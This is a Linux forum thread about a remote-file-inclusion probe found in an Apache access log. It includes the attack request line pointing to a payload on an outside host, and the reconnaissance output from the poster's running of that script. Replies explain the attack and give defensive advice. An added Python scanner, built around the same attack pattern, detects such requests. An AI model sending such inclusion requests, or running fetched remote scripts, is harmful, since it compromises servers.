LinuxQuestions.org
Linux - Security This forum is for all security related questions.
Questions, tips, system compromises, firewalls, etc. are all included here.

Old 12-11-2008, 08:56 AM   #1
spycxamaican
LQ Newbie
 
possible hack attack?


I run a web server on my opensuse 10.x box and check access_log and error_log frequently. Today I found this entry:

80.67.23.3 - - [10/Dec/2008:06:13:24 -0500] "GET /phpproj/catalog/includes/include_once.php?include_file=http://www.jkijmond.nl/jl/response.txt%0D?? HTTP/1.1" 404 1056 "-"

It was repeated 4 times. Just the time and date are different. I copied response.txt to my web server and ran it. This is what was displayed:
Osirys
uid=30(wwwrun) gid=8(www) groups=8(www),111(vboxusers) 0sirys was here ..
uname -a: Linux zombie13 2.6.22.19-0.1-default #1 SMP 2008-10-14 22:17:43 +0200 x86_64
os: Linux
id: uid=30(wwwrun) gid=8(www) groups=8(www),111(vboxusers)
free: 5.13 Gb
used: 44.13 Gb
total: 49.26 Gb

Does this information present a security risk? If so, what may be done to prevent attacks using this information?

I have blocked the IP range 80.67.23.0 - 80.67.23.255 to prevent further attempts coming from domainfactory GmbH.

TIA for your advice,

Philip
 
Old 12-11-2008, 09:30 AM   #2
malaprop
LQ Newbie
 
It's a PHP remote upload exploit. I can't seem to find much else about it, but I didn't look very long.
 
Old 01-08-2009, 10:36 AM   #3
lylemwood
Member
 
Hey spycxamaican,

I suppose the first thing that security geeks like me ask is, is it necessary for you to support file uploads on your server?

Any services that are not ESSENTIAL to operation should be disabled on a public-facing box.

Also, are you running the latest versions of both Apache AND PHP? (I mean that when you check your distro's update-manager you find no updates necessary.)

These zombie-makers come out of the woodwork from time to time and it's necessary to deal with them ONLY when they can affect a service you need. If you don't need it, just disable the service and update.

Thanks and HTH,

Lyle
 
Old 01-08-2009, 12:36 PM   #4
unixfool
Member
 
http://www.jkijmond.nl is now fixed. Usually, such sites are compromised (where the owner is unaware) and hosting/serving malware as a third party.

I'm sure you'll see tons of such traffic in your logs (I do). As long as you know that you don't allow uploads, you're ok (but check from time to time anyways).

Oh, and one thing I'd NEVER do is download questionable code and execute it, especially without viewing and assessing the code first. Fortunately, it appears that that script was just gathering data. Someone who may be keeping a list of possible hosts to attack could use that type of data.

Last edited by unixfool; 01-08-2009 at 12:41 PM.
 
Old 01-11-2009, 07:44 PM   #5
spycxamaican
LQ Newbie
 
Thank you for your feedback

Quote (originally posted by spycxamaican):
I run a web server on my opensuse 10.x box and check access_log and error_log frequently. Today I found this entry - ....

Does this information present a security risk? If so what may be done to ...

I have blocked the ip range 80.67.23.0 - 80.67.23.255 to prevent further ...

TIA for your advice,

Philip
Hi everyone,

Thank you for your feedback. Currently, I do not allow file uploads. Updates are done regularly, i.e. when I am notified updates are available. One discovery is my current router does not allow me to block specific IP addresses or IP ranges. The one that allows me to do that blocks my VOIP phone line.

Now that I am learning to create web sites with PHP and MySQL, file uploads may be allowed in the future. My research has found specific PHP code that should enhance the security of my PHP scripts to prevent XSS, invalid input, etc.

Again, thank you for your feedback.

Philip
 
Old 01-12-2009, 03:39 PM   #6
unSpawn
Moderator
 
Quote (originally posted by spycxamaican):
My research has found specific PHP code that should enhance the security of my PHP scripts to prevent XSS, invalid input etc.
Post a pointer to what you found?

BTW, if you're researching PHP security please look up Snort, Suhosin, PHP IDS and mod_security. And remember security is multi-layered and a continuous process.
 
Old 01-13-2009, 10:47 AM   #7
lylemwood
Member
 
Howdy again, I just got another update email for this post and I re-read from the beginning...

Notwithstanding the fact that, ultimately, this may be originating at some zombie attempting an upload exploit, remember the critical element here... The response code: 404 (Your server told it to piss off)

Naturally, zombies just roam through the web tapping everybody's door to see who was dumb enough to leave the key in the lock outside. I've had one server running three virtual hosts and they each have an entry in their log (after only one day of operating!!!) from some "Morpheus F**king Scanner" (no joke, that was the actual text in the log) zombie.

But the response codes are all 404s so there's no risk to me.

Keep patched, disable unnecessary services, and keep an eye on those logs for things that DON'T go 404...

Oh, and as unSpawn asked, please do submit any tweaks you have for scripting security, etc.

Excellent posting, btw, everyone, this is one of the first security-related threads I've seen that DIDN'T go all crazy with advice to block everyone's ip and start wearing foil hats.
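What the thread advises, as an added Python example that is not from any poster: parse Apache combined access-log lines, flag every query parameter whose value is a remote URL (the pattern in post #1's entry, including URL-encoded and double-encoded forms), and mark hits that did not get a 404, since post #7's point is that those are the ones to look at. The log lines in SAMPLE_LOG are constructed; the first reproduces the request from the original post.

```python
"""Flag remote-file-inclusion (RFI) probes in an Apache combined access log. Added
example for this thread, not any poster's code; sample lines are constructed."""
import re
from urllib.parse import parse_qsl, unquote, urlparse
# Combined format: host ident user [time] "request" status bytes "referer" "agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+)[^"]*" (?P<status>\d{3}) \S+'
)
REMOTE_SCHEMES = ("http", "https", "ftp")  # a local include never needs these

SAMPLE_LOG = [
    # The OP's entry (user-agent field added so the line is well-formed).
    '80.67.23.3 - - [10/Dec/2008:06:13:24 -0500] "GET /phpproj/catalog/includes/'
    'include_once.php?include_file=http://www.jkijmond.nl/jl/response.txt%0D?? '
    'HTTP/1.1" 404 1056 "-" "-"',
    # Constructed: ordinary page request, must not be flagged.
    '203.0.113.5 - - [10/Dec/2008:07:00:00 -0500] "GET /index.php?page=about '
    'HTTP/1.1" 200 2048 "-" "-"',
    # Constructed: URL-encoded remote URL that did NOT get a 404 (post #7's case).
    '198.51.100.7 - - [11/Dec/2008:01:02:03 -0500] "GET /catalog/index.php?'
    'cfg=http%3A%2F%2Fexample.invalid%2Fr.txt HTTP/1.1" 200 512 "-" "-"',
]

def rfi_params(request_path):
    """Return [(name, value)] for query parameters whose value is a remote URL."""
    hits = []
    for name, value in parse_qsl(urlparse(request_path).query, keep_blank_values=True):
        decoded = unquote(value)  # parse_qsl decoded once; also catch double-encoding
        if urlparse(decoded).scheme.lower() in REMOTE_SCHEMES:
            hits.append((name, decoded))
    return hits

def scan(lines):
    """Return one record per request that carries a remote URL in a parameter."""
    records = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a combined-format line; skip rather than guess
        hits = rfi_params(m["path"])
        if hits:
            records.append({"ip": m["ip"], "time": m["time"],
                            "status": int(m["status"]), "params": hits,
                            # 404: no such script here; anything else reached real code
                            "needs_review": m["status"] != "404"})
    return records

for r in scan(SAMPLE_LOG):
    print("REVIEW" if r["needs_review"] else "probe ", r["status"], r["ip"], r["params"])
```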
 
Old 01-13-2009, 01:57 PM   #8
spycxamaican
LQ Newbie
 
Thanks for the heads up

Quote (originally posted by unSpawn):
Post a pointer to what you found?

BTW, if you're researching PHP security please look up Snort, Suhosin, PHP IDS and mod_security. And remember security is multi-layered and a continuous process.
This site is very helpful: Virginia Tech (http://www.hosting.vt.edu/tutorials/phpmysql/). However, the more advanced features in this tutorial will only work when all required Apache, PHP and MySQL modules are installed.

Thanks for the heads up regarding security. This is why I am taking things slowly, building the web apps with security in mind while researching the security issues involved in hosting on a public-facing server.

Philip
 
  


All times are GMT -5.
